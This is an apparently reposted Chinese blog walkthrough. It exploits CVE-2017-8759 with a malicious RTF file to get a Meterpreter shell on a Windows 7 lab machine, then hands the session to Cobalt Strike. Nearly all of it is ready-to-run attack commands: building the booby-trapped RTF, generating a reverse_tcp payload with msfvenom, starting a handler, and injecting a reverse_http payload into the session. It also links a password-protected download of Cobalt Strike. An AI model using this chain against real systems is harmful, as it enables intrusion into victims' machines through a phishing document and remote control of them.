标签:ever 生成 gen width 监听器 技术 https 文件 shell
1. 前言
metasploit 获取的 shell 派生给其他工具,例如 Cobaltstrike
以 CVE-2017-8759 为例通过 msf 获取 shell 后派生给 Cobaltstrike
2. 环境
Kali : 192.168.229.143
win7 : 192.168.229.137
Cobaltstrike+jdk:链接:http://pan.baidu.com/s/1eSJ7P54 密码:krqn CVE-2017-8759-exp: https://github.com/bhdresh/CVE-2017-8759.git
3. exploit CVE-2017-8759
# git clone https://github.com/bhdresh/CVE-2017-8759.git 1) 生成 RTF 文件 # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.229.143/logo.txt 2) 生成 MSF payload 并启动 handler # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.229.143 LPORT=4444 -f exe > /tmp/shell.exe # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.229.143; run" 3) 开发模式下传送本地 payload # python cve-2017-8759_toolkit.py -M exp -e http://192.168.229.143/shell.exe -l /tmp/shell.exe
4. 派生 shell 给 Cobalt strike
打开 Cobalt strike 创建一个新的监听器
注入一个新的 payload 到当前 session 中
msf exploit(handler) > use exploit/windows/local/payload_inject msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http msf exploit(payload_inject) > set DisablePayloadHandler true msf exploit(payload_inject) > set LHOST 192.168.229.143 msf exploit(payload_inject) > set LPORT 1212 msf exploit(payload_inject) > set SESSION 1 msf exploit(payload_inject) > exploit
http://blog.csdn.net/qq_27446553/article/details/52282457
标签:ever 生成 gen width 监听器 技术 https 文件 shell
原文地址:http://www.cnblogs.com/trojan-z/p/7600928.html
